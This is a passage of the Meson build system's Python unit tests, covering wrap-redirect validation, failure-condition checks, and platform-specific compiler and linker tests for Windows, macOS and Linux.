os.path.join(self.unit_test_dir, '79 nostdlib') machinefile = os.path.join(self.builddir, 'machine.txt') with open(machinefile, 'w') as f: f.write(textwrap.dedent(''' [properties] c_stdlib = 'mylibc' ''')) # Test native C stdlib self.meson_native_file = machinefile self.init(testdir) self.build() # Test cross C stdlib self.new_builddir() self.meson_native_file = None self.meson_cross_file = machinefile self.init(testdir) self.build() def test_meson_version_compare(self): testdir = os.path.join(self.unit_test_dir, '83 meson version compare') out = self.init(testdir) self.assertNotRegex(out, r'WARNING') def test_wrap_redirect(self): redirect_wrap = os.path.join(self.builddir, 'redirect.wrap') real_wrap = os.path.join(self.builddir, 'foo/subprojects/real.wrap') os.makedirs(os.path.dirname(real_wrap)) # Invalid redirect, filename must have .wrap extension with open(redirect_wrap, 'w') as f: f.write(textwrap.dedent(''' [wrap-redirect] filename = foo/subprojects/real.wrapper ''')) with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be a .wrap file'): PackageDefinition(redirect_wrap) # Invalid redirect, filename cannot be in parent directory with open(redirect_wrap, 'w') as f: f.write(textwrap.dedent(''' [wrap-redirect] filename = ../real.wrap ''')) with self.assertRaisesRegex(WrapException, 'wrap-redirect filename cannot contain ".."'): PackageDefinition(redirect_wrap) # Invalid redirect, filename must be in foo/subprojects/real.wrap with open(redirect_wrap, 'w') as f: f.write(textwrap.dedent(''' [wrap-redirect] filename = foo/real.wrap ''')) with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be in the form foo/subprojects/bar.wrap'): wrap = PackageDefinition(redirect_wrap) # Correct redirect with open(redirect_wrap, 'w') as f: f.write(textwrap.dedent(''' [wrap-redirect] filename = foo/subprojects/real.wrap ''')) with open(real_wrap, 'w') as f: f.write(textwrap.dedent(''' [wrap-git] url = http://invalid ''')) wrap = PackageDefinition(redirect_wrap) self.assertEqual(wrap.get('url'), 'http://invalid') @skip_if_no_cmake def test_nested_cmake_rebuild(self) -> None: # This checks a bug where if a non-meson project is used as a third # level (or deeper) subproject it doesn't cause a rebuild if the build # files for that project are changed testdir = os.path.join(self.unit_test_dir, '86 nested subproject regenerate depends') cmakefile = Path(testdir) / 'subprojects' / 'sub2' / 'CMakeLists.txt' self.init(testdir) self.build() with cmakefile.open('a') as f: os.utime(str(cmakefile)) self.assertReconfiguredBuildIsNoop() class FailureTests(BasePlatformTests): ''' Tests that test failure conditions. Build files here should be dynamically generated and static tests should go into `test cases/failing*`. This is useful because there can be many ways in which a particular function can fail, and creating failing tests for all of them is tedious and slows down testing. ''' dnf = "[Dd]ependency.*not found(:.*)?" nopkg = '[Pp]kg-config.*not found' def setUp(self): super().setUp() self.srcdir = os.path.realpath(tempfile.mkdtemp()) self.mbuild = os.path.join(self.srcdir, 'meson.build') self.moptions = os.path.join(self.srcdir, 'meson_options.txt') def tearDown(self): super().tearDown() windows_proof_rmtree(self.srcdir) def assertMesonRaises(self, contents, match, *, extra_args=None, langs=None, meson_version=None, options=None, override_envvars=None): ''' Assert that running meson configure on the specified @contents raises a error message matching regex @match. ''' if langs is None: langs = [] with open(self.mbuild, 'w') as f: f.write("project('failure test', 'c', 'cpp'") if meson_version: f.write(", meson_version: '{}'".format(meson_version)) f.write(")\n") for lang in langs: f.write("add_languages('{}', required : false)\n".format(lang)) f.write(contents) if options is not None: with open(self.moptions, 'w') as f: f.write(options) o = {'MESON_FORCE_BACKTRACE': '1'} if override_envvars is None: override_envvars = o else: override_envvars.update(o) # Force tracebacks so we can detect them properly with self.assertRaisesRegex(MesonException, match, msg=contents): # Must run in-process or we'll get a generic CalledProcessError self.init(self.srcdir, extra_args=extra_args, inprocess=True, override_envvars = override_envvars) def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None): if langs is None: langs = [] with open(self.mbuild, 'w') as f: f.write("project('output test', 'c', 'cpp'") if meson_version: f.write(", meson_version: '{}'".format(meson_version)) f.write(")\n") for lang in langs: f.write("add_languages('{}', required : false)\n".format(lang)) f.write(contents) # Run in-process for speed and consistency with assertMesonRaises return self.init(self.srcdir, extra_args=extra_args, inprocess=True) def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None): ''' Assert that running meson configure on the specified @contents outputs something that matches regex @match. ''' out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version) self.assertRegex(out, match) def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None): ''' Assert that running meson configure on the specified @contents does not output something that matches regex @match. ''' out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version) self.assertNotRegex(out, match) @skipIfNoPkgconfig def test_dependency(self): if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0: raise unittest.SkipTest('zlib not found with pkg-config') a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"), ("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"), ("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"), ("dependency('zlib', required : 1)", "[Rr]equired.*boolean"), ("dependency('zlib', method : 1)", "[Mm]ethod.*string"), ("dependency('zlibfail')", self.dnf),) for contents, match in a: self.assertMesonRaises(contents, match) def test_apple_frameworks_dependency(self): if not is_osx(): raise unittest.SkipTest('only run on macOS') self.assertMesonRaises("dependency('appleframeworks')", "requires at least one module") def test_extraframework_dependency_method(self): code = "dependency('python', method : 'extraframework')" if not is_osx(): self.assertMesonRaises(code, self.dnf) else: # Python2 framework is always available on macOS self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES') def test_sdl2_notfound_dependency(self): # Want to test failure, so skip if available if shutil.which('sdl2-config'): raise unittest.SkipTest('sdl2-config found') self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf) if shutil.which('pkg-config'): self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf) with no_pkgconfig(): # Look for pkg-config, cache it, then # Use cached pkg-config without erroring out, then # Use cached pkg-config to error out code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \ "dependency('foobarrr2', method : 'pkg-config', required : false)\n" \ "dependency('sdl2', method : 'pkg-config')" self.assertMesonRaises(code, self.nopkg) def test_gnustep_notfound_dependency(self): # Want to test failure, so skip if available if shutil.which('gnustep-config'): raise unittest.SkipTest('gnustep-config found') self.assertMesonRaises("dependency('gnustep')", "(requires a Objc compiler|{})".format(self.dnf), langs = ['objc']) def test_wx_notfound_dependency(self): # Want to test failure, so skip if available if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'): raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found') self.assertMesonRaises("dependency('wxwidgets')", self.dnf) self.assertMesonOutputs("dependency('wxwidgets', required : false)", "Run-time dependency .*WxWidgets.* found: .*NO.*") def test_wx_dependency(self): if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'): raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found') self.assertMesonRaises("dependency('wxwidgets', modules : 1)", "module argument is not a string") def test_llvm_dependency(self): self.assertMesonRaises("dependency('llvm', modules : 'fail')", "(required.*fail|{})".format(self.dnf)) def test_boost_notfound_dependency(self): # Can be run even if Boost is found or not self.assertMesonRaises("dependency('boost', modules : 1)", "module.*not a string") self.assertMesonRaises("dependency('boost', modules : 'fail')", "(fail.*not found|{})".format(self.dnf)) def test_boost_BOOST_ROOT_dependency(self): # Test BOOST_ROOT; can be run even if Boost is found or not self.assertMesonRaises("dependency('boost')", "(boost_root.*absolute|{})".format(self.dnf), override_envvars = {'BOOST_ROOT': 'relative/path'}) def test_dependency_invalid_method(self): code = '''zlib_dep = dependency('zlib', required : false) zlib_dep.get_configtool_variable('foo') ''' self.assertMesonRaises(code, ".* is not a config-tool dependency") code = '''zlib_dep = dependency('zlib', required : false) dep = declare_dependency(dependencies : zlib_dep) dep.get_pkgconfig_variable('foo') ''' self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal") code = '''zlib_dep = dependency('zlib', required : false) dep = declare_dependency(dependencies : zlib_dep) dep.get_configtool_variable('foo') ''' self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal") def test_objc_cpp_detection(self): ''' Test that when we can't detect objc or objcpp, we fail gracefully. ''' env = get_fake_env() try: env.detect_objc_compiler(MachineChoice.HOST) env.detect_objcpp_compiler(MachineChoice.HOST) except EnvironmentException: code = "add_languages('objc')\nadd_languages('objcpp')" self.assertMesonRaises(code, "Unknown compiler") return raise unittest.SkipTest("objc and objcpp found, can't test detection failure") def test_subproject_variables(self): ''' Test that: 1. The correct message is outputted when a not-required dep is not found and the fallback subproject is also not found. 2. A not-required fallback dependency is not found because the subproject failed to parse. 3. A not-found not-required dep with a fallback subproject outputs the correct message when the fallback subproject is found but the variable inside it is not. 4. A fallback dependency is found from the subproject parsed in (3) 5. A wrap file from a subproject is used but fails because it does not contain required keys. ''' tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables') out = self.init(tdir, inprocess=True) self.assertRegex(out, r"Neither a subproject directory nor a .*nosubproj.wrap.* file was found") self.assertRegex(out, r'Function does not take positional arguments.') self.assertRegex(out, r'Dependency .*somenotfounddep.* from subproject .*subprojects/somesubproj.* found: .*NO.*') self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*') self.assertRegex(out, r'Missing key .*source_filename.* in subsubproject.wrap') def test_exception_exit_status(self): ''' Test exit status on python exception ''' tdir = os.path.join(self.unit_test_dir, '21 exit status') with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'}) self.assertEqual(cm.exception.returncode, 2) self.wipe() def test_dict_requires_key_value_pairs(self): self.assertMesonRaises("dict = {3, 'foo': 'bar'}", 'Only key:value pairs are valid in dict construction.') self.assertMesonRaises("{'foo': 'bar', 3}", 'Only key:value pairs are valid in dict construction.') def test_dict_forbids_duplicate_keys(self): self.assertMesonRaises("dict = {'a': 41, 'a': 42}", 'Duplicate dictionary key: a.*') def test_dict_forbids_integer_key(self): self.assertMesonRaises("dict = {3: 'foo'}", 'Key must be a string.*') def test_using_too_recent_feature(self): # Here we use a dict, which was introduced in 0.47.0 self.assertMesonOutputs("dict = {}", ".*WARNING.*Project targeting.*but.*", meson_version='>= 0.46.0') def test_using_recent_feature(self): # Same as above, except the meson version is now appropriate self.assertMesonDoesNotOutput("dict = {}", ".*WARNING.*Project targeting.*but.*", meson_version='>= 0.47') def test_using_too_recent_feature_dependency(self): self.assertMesonOutputs("dependency('pcap', required: false)", ".*WARNING.*Project targeting.*but.*", meson_version='>= 0.41.0') def test_vcs_tag_featurenew_build_always_stale(self): 'https://github.com/mesonbuild/meson/issues/3904' vcs_tag = '''version_data = configuration_data() version_data.set('PROJVER', '@VCS_TAG@') vf = configure_file(output : 'version.h.in', configuration: version_data) f = vcs_tag(input : vf, output : 'version.h') ''' msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*' self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43') def test_missing_subproject_not_required_and_required(self): self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" + "sub2 = subproject('not-found-subproject', required: true)", """.*Subproject "subprojects/not-found-subproject" required but not found.*""") def test_get_variable_on_not_found_project(self): self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" + "sub1.get_variable('naaa')", """Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""") def test_version_checked_before_parsing_options(self): ''' https://github.com/mesonbuild/meson/issues/5281 ''' options = "option('some-option', type: 'foo', value: '')" match = 'Meson version is.*but project requires >=2000' self.assertMesonRaises("", match, meson_version='>=2000', options=options) def test_assert_default_message(self): self.assertMesonRaises("k1 = 'a'\n" + "assert({\n" + " k1: 1,\n" + "}['a'] == 2)\n", r"Assert failed: {k1 : 1}\['a'\] == 2") def test_wrap_nofallback(self): self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])", r"Dependency \'notfound\' not found and fallback is disabled", extra_args=['--wrap-mode=nofallback']) def test_message(self): self.assertMesonOutputs("message('Array:', ['a', 'b'])", r"Message:.* Array: \['a', 'b'\]") def test_warning(self): self.assertMesonOutputs("warning('Array:', ['a', 'b'])", r"WARNING:.* Array: \['a', 'b'\]") def test_override_dependency_twice(self): self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" + "meson.override_dependency('foo', declare_dependency())", """Tried to override dependency 'foo' which has already been resolved or overridden""") @unittest.skipIf(is_windows(), 'zlib is not available on Windows') def test_override_resolved_dependency(self): self.assertMesonRaises("dependency('zlib')\n" + "meson.override_dependency('zlib', declare_dependency())", """Tried to override dependency 'zlib' which has already been resolved or overridden""") @unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)") class WindowsTests(BasePlatformTests): ''' Tests that should run on Cygwin, MinGW, and MSVC ''' def setUp(self): super().setUp() self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows') @unittest.skipIf(is_cygwin(), 'Test only applicable to Windows') @mock.patch.dict(os.environ) def test_find_program(self): ''' Test that Windows-specific edge-cases in find_program are functioning correctly. Cannot be an ordinary test because it involves manipulating PATH to point to a directory with Python scripts. ''' testdir = os.path.join(self.platform_test_dir, '8 find program') # Find `cmd` and `cmd.exe` prog1 = ExternalProgram('cmd') self.assertTrue(prog1.found(), msg='cmd not found') prog2 = ExternalProgram('cmd.exe') self.assertTrue(prog2.found(), msg='cmd.exe not found') self.assertPathEqual(prog1.get_path(), prog2.get_path()) # Find cmd.exe with args without searching prog = ExternalProgram('cmd', command=['cmd', '/C']) self.assertTrue(prog.found(), msg='cmd not found with args') self.assertPathEqual(prog.get_command()[0], 'cmd') # Find cmd with an absolute path that's missing the extension cmd_path = prog2.get_path()[:-4] prog = ExternalProgram(cmd_path) self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path)) # Finding a script with no extension inside a directory works prog = ExternalProgram(os.path.join(testdir, 'test-script')) self.assertTrue(prog.found(), msg='test-script not found') # Finding a script with an extension inside a directory works prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py')) self.assertTrue(prog.found(), msg='test-script-ext.py not found') # Finding a script in PATH os.environ['PATH'] += os.pathsep + testdir # If `.PY` is in PATHEXT, scripts can be found as programs if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]: # Finding a script in PATH w/o extension works and adds the interpreter prog = ExternalProgram('test-script-ext') self.assertTrue(prog.found(), msg='test-script-ext not found in PATH') self.assertPathEqual(prog.get_command()[0], python_command[0]) self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py') # Finding a script in PATH with extension works and adds the interpreter prog = ExternalProgram('test-script-ext.py') self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH') self.assertPathEqual(prog.get_command()[0], python_command[0]) self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py') # Using a script with an extension directly via command= works and adds the interpreter prog = ExternalProgram('test-script-ext.py', command=[os.path.join(testdir, 'test-script-ext.py'), '--help']) self.assertTrue(prog.found(), msg='test-script-ext.py with full path not picked up via command=') self.assertPathEqual(prog.get_command()[0], python_command[0]) self.assertPathEqual(prog.get_command()[2], '--help') self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py') # Using a script without an extension directly via command= works and adds the interpreter prog = ExternalProgram('test-script', command=[os.path.join(testdir, 'test-script'), '--help']) self.assertTrue(prog.found(), msg='test-script with full path not picked up via command=') self.assertPathEqual(prog.get_command()[0], python_command[0]) self.assertPathEqual(prog.get_command()[2], '--help') self.assertPathBasenameEqual(prog.get_path(), 'test-script') # Ensure that WindowsApps gets removed from PATH path = os.environ['PATH'] if 'WindowsApps' not in path: username = os.environ['USERNAME'] appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username) path = os.pathsep + appstore_dir path = ExternalProgram._windows_sanitize_path(path) self.assertNotIn('WindowsApps', path) def test_ignore_libs(self): ''' Test that find_library on libs that are to be ignored returns an empty array of arguments. Must be a unit test because we cannot inspect ExternalLibraryHolder from build files. ''' testdir = os.path.join(self.platform_test_dir, '1 basic') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_argument_syntax() != 'msvc': raise unittest.SkipTest('Not using MSVC') # To force people to update this test, and also test self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'}) for l in cc.ignore_libs: self.assertEqual(cc.find_library(l, env, []), []) def test_rc_depends_files(self): testdir = os.path.join(self.platform_test_dir, '5 resources') # resource compiler depfile generation is not yet implemented for msvc env = get_fake_env(testdir, self.builddir, self.prefix) depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'} self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Test compile_resources(depend_file:) # Changing mtime of sample.ico should rebuild prog self.utime(os.path.join(testdir, 'res', 'sample.ico')) self.assertRebuiltTarget('prog') # Test depfile generation by compile_resources # Changing mtime of resource.h should rebuild myres.rc and then prog if depfile_works: self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h')) self.assertRebuiltTarget('prog') self.wipe() if depfile_works: testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets') self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Changing mtime of resource.h should rebuild myres_1.rc and then prog_1 self.utime(os.path.join(testdir, 'res', 'resource.h')) self.assertRebuiltTarget('prog_1') def test_msvc_cpp17(self): testdir = os.path.join(self.unit_test_dir, '45 vscpp17') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_argument_syntax() != 'msvc': raise unittest.SkipTest('Test only applies to MSVC-like compilers') try: self.init(testdir) except subprocess.CalledProcessError: # According to Python docs, output is only stored when # using check_output. We don't use it, so we can't check # that the output is correct (i.e. that it failed due # to the right reason). return self.build() def test_install_pdb_introspection(self): testdir = os.path.join(self.platform_test_dir, '1 basic') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_argument_syntax() != 'msvc': raise unittest.SkipTest('Test only applies to MSVC-like compilers') self.init(testdir) installed = self.introspect('--installed') files = [os.path.basename(path) for path in installed.values()] self.assertTrue('prog.pdb' in files) def _check_ld(self, name: str, lang: str, expected: str) -> None: if not shutil.which(name): raise unittest.SkipTest('Could not find {}.'.format(name)) envvars = [mesonbuild.envconfig.ENV_VAR_PROG_MAP['{}_ld'.format(lang)]] # Also test a deprecated variable if there is one. if f'{lang}_ld' in mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP: envvars.append( mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP[f'{lang}_ld']) for envvar in envvars: with mock.patch.dict(os.environ, {envvar: name}): env = get_fake_env() try: comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) except EnvironmentException: raise unittest.SkipTest('Could not find a compiler for {}'.format(lang)) self.assertEqual(comp.linker.id, expected) def test_link_environment_variable_lld_link(self): env = get_fake_env() comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST) if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler): raise unittest.SkipTest('GCC cannot be used with link compatible linkers.') self._check_ld('lld-link', 'c', 'lld-link') def test_link_environment_variable_link(self): env = get_fake_env() comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST) if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler): raise unittest.SkipTest('GCC cannot be used with link compatible linkers.') self._check_ld('link', 'c', 'link') def test_link_environment_variable_optlink(self): env = get_fake_env() comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST) if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler): raise unittest.SkipTest('GCC cannot be used with link compatible linkers.') self._check_ld('optlink', 'c', 'optlink') @skip_if_not_language('rust') def test_link_environment_variable_rust(self): self._check_ld('link', 'rust', 'link') @skip_if_not_language('d') def test_link_environment_variable_d(self): env = get_fake_env() comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST) if comp.id == 'dmd': raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.') self._check_ld('lld-link', 'd', 'lld-link') def test_pefile_checksum(self): try: import pefile except ImportError: if is_ci(): raise raise unittest.SkipTest('pefile module not found') testdir = os.path.join(self.common_test_dir, '6 linkshared') self.init(testdir, extra_args=['--buildtype=release']) self.build() # Test that binaries have a non-zero checksum env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) cc_id = cc.get_id() ld_id = cc.get_linker_id() dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0] exe = os.path.join(self.builddir, 'cppprog.exe') for f in (dll, exe): pe = pefile.PE(f) msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id) if cc_id == 'clang-cl': # Latest clang-cl tested (7.0) does not write checksums out self.assertFalse(pe.verify_checksum(), msg=msg) else: # Verify that a valid checksum was written by all other compilers self.assertTrue(pe.verify_checksum(), msg=msg) def test_qt5dependency_vscrt(self): ''' Test that qt5 dependencies use the debug module suffix when b_vscrt is set to 'mdd' ''' # Verify that the `b_vscrt` option is available env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) if OptionKey('b_vscrt') not in cc.base_options: raise unittest.SkipTest('Compiler does not support setting the VS CRT') # Verify that qmake is for Qt5 if not shutil.which('qmake-qt5'): if not shutil.which('qmake') and not is_ci(): raise unittest.SkipTest('QMake not found') output = subprocess.getoutput('qmake --version') if 'Qt version 5' not in output and not is_ci(): raise unittest.SkipTest('Qmake found, but it is not for Qt 5.') # Setup with /MDd testdir = os.path.join(self.framework_test_dir, '4 qt') self.init(testdir, extra_args=['-Db_vscrt=mdd']) # Verify that we're linking to the debug versions of Qt DLLs build_ninja = os.path.join(self.builddir, 'build.ninja') with open(build_ninja, 'r', encoding='utf-8') as f: contents = f.read() m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents) self.assertIsNotNone(m, msg=contents) def test_compiler_checks_vscrt(self): ''' Test that the correct VS CRT is used when running compiler checks ''' # Verify that the `b_vscrt` option is available env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) if OptionKey('b_vscrt') not in cc.base_options: raise unittest.SkipTest('Compiler does not support setting the VS CRT') def sanitycheck_vscrt(vscrt): checks = self.get_meson_log_sanitychecks() self.assertTrue(len(checks) > 0) for check in checks: self.assertIn(vscrt, check) testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) sanitycheck_vscrt('/MDd') self.new_builddir() self.init(testdir, extra_args=['-Dbuildtype=debugoptimized']) sanitycheck_vscrt('/MD') self.new_builddir() self.init(testdir, extra_args=['-Dbuildtype=release']) sanitycheck_vscrt('/MD') self.new_builddir() self.init(testdir, extra_args=['-Db_vscrt=md']) sanitycheck_vscrt('/MD') self.new_builddir() self.init(testdir, extra_args=['-Db_vscrt=mdd']) sanitycheck_vscrt('/MDd') self.new_builddir() self.init(testdir, extra_args=['-Db_vscrt=mt']) sanitycheck_vscrt('/MT') self.new_builddir() self.init(testdir, extra_args=['-Db_vscrt=mtd']) sanitycheck_vscrt('/MTd') def test_modules(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('C++ modules only work with the Ninja backend (not {}).'.format(self.backend.name)) if 'VSCMD_VER' not in os.environ: raise unittest.SkipTest('C++ modules is only supported with Visual Studio.') if version_compare(os.environ['VSCMD_VER'], '<16.9.0'): raise unittest.SkipTest('C++ modules are only supported with VS 2019 Preview or newer.') self.init(os.path.join(self.unit_test_dir, '87 cpp modules')) self.build() @unittest.skipUnless(is_osx(), "requires Darwin") class DarwinTests(BasePlatformTests): ''' Tests that should run on macOS ''' def setUp(self): super().setUp() self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx') def test_apple_bitcode(self): ''' Test that -fembed-bitcode is correctly added while compiling and -bitcode_bundle is added while linking when b_bitcode is true and not when it is false. This can't be an ordinary test case because we need to inspect the compiler database. ''' testdir = os.path.join(self.platform_test_dir, '7 bitcode') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.id != 'clang': raise unittest.SkipTest('Not using Clang on OSX') # Try with bitcode enabled out = self.init(testdir, extra_args='-Db_bitcode=true') # Warning was printed self.assertRegex(out, 'WARNING:.*b_bitcode') # Compiler options were added for compdb in self.get_compdb(): if 'module' in compdb['file']: self.assertNotIn('-fembed-bitcode', compdb['command']) else: self.assertIn('-fembed-bitcode', compdb['command']) build_ninja = os.path.join(self.builddir, 'build.ninja') # Linker options were added with open(build_ninja, 'r', encoding='utf-8') as f: contents = f.read() m = re.search('LINK_ARGS =.*-bitcode_bundle', contents) self.assertIsNotNone(m, msg=contents) # Try with bitcode disabled self.setconf('-Db_bitcode=false') # Regenerate build self.build() for compdb in self.get_compdb(): self.assertNotIn('-fembed-bitcode', compdb['command']) build_ninja = os.path.join(self.builddir, 'build.ninja') with open(build_ninja, 'r', encoding='utf-8') as f: contents = f.read() m = re.search('LINK_ARGS =.*-bitcode_bundle', contents) self.assertIsNone(m, msg=contents) def test_apple_bitcode_modules(self): ''' Same as above, just for shared_module() ''' testdir = os.path.join(self.common_test_dir, '149 shared module resolving symbol in executable') # Ensure that it builds even with bitcode enabled self.init(testdir, extra_args='-Db_bitcode=true') self.build() self.run_tests() def _get_darwin_versions(self, fname): fname = os.path.join(self.builddir, fname) out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True) m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1]) self.assertIsNotNone(m, msg=out) return m.groups() @skipIfNoPkgconfig def test_library_versioning(self): ''' Ensure that compatibility_version and current_version are set correctly ''' testdir = os.path.join(self.platform_test_dir, '2 library versions') self.init(testdir) self.build() targets = {} for t in self.introspect('--targets'): targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename'] self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0')) self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0')) self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0')) self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0')) self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0')) self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0')) self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0')) self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0')) self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1')) def test_duplicate_rpath(self): testdir = os.path.join(self.unit_test_dir, '10 build_rpath') # We purposely pass a duplicate rpath to Meson, in order # to ascertain that Meson does not call install_name_tool # with duplicate -delete_rpath arguments, which would # lead to erroring out on installation env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"} self.init(testdir, override_envvars=env) self.build() self.install() def test_removing_unused_linker_args(self): testdir = os.path.join(self.common_test_dir, '105 has arg') env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'} self.init(testdir, override_envvars=env) @unittest.skipUnless(not is_windows(), "requires something Unix-like") class LinuxlikeTests(BasePlatformTests): ''' Tests that should run on Linux, macOS, and *BSD ''' def test_basic_soname(self): ''' Test that the soname is set correctly for shared libraries. This can't be an ordinary test case because we need to run `readelf` and actually check the soname. https://github.com/mesonbuild/meson/issues/785 ''' testdir = os.path.join(self.common_test_dir, '4 shared') self.init(testdir) self.build() lib1 = os.path.join(self.builddir, 'libmylib.so') soname = get_soname(lib1) self.assertEqual(soname, 'libmylib.so') def test_custom_soname(self): ''' Test that the soname is set correctly for shared libraries when a custom prefix and/or suffix is used. This can't be an ordinary test case because we need to run `readelf` and actually check the soname. https://github.com/mesonbuild/meson/issues/785 ''' testdir = os.path.join(self.common_test_dir, '25 library versions') self.init(testdir) self.build() lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix') soname = get_soname(lib1) self.assertEqual(soname, 'prefixsomelib.suffix') def test_pic(self): ''' Test that -fPIC is correctly added to static libraries when b_staticpic is true and not when it is false. This can't be an ordinary test case because we need to inspect the compiler database. ''' if is_windows() or is_cygwin() or is_osx(): raise unittest.SkipTest('PIC not relevant') testdir = os.path.join(self.common_test_dir, '3 static') self.init(testdir) compdb = self.get_compdb() self.assertIn('-fPIC', compdb[0]['command']) self.setconf('-Db_staticpic=false') # Regenerate build self.build() compdb = self.get_compdb() self.assertNotIn('-fPIC', compdb[0]['command']) @mock.patch.dict(os.environ) def test_pkgconfig_gen(self): ''' Test that generated pkg-config files can be found and have the correct version and link args. This can't be an ordinary test case because we need to run pkg-config outside of a Meson build file. https://github.com/mesonbuild/meson/issues/889 ''' testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') self.init(testdir) env = get_fake_env(testdir, self.builddir, self.prefix) kwargs = {'required': True, 'silent': True} os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir foo_dep = PkgConfigDependency('libfoo', env, kwargs) self.assertTrue(foo_dep.found()) self.assertEqual(foo_dep.get_version(), '1.0') self.assertIn('-lfoo', foo_dep.get_link_args()) self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar') self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data') libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs) self.assertTrue(libhello_nolib.found()) self.assertEqual(libhello_nolib.get_link_args(), []) self.assertEqual(libhello_nolib.get_compile_args(), []) 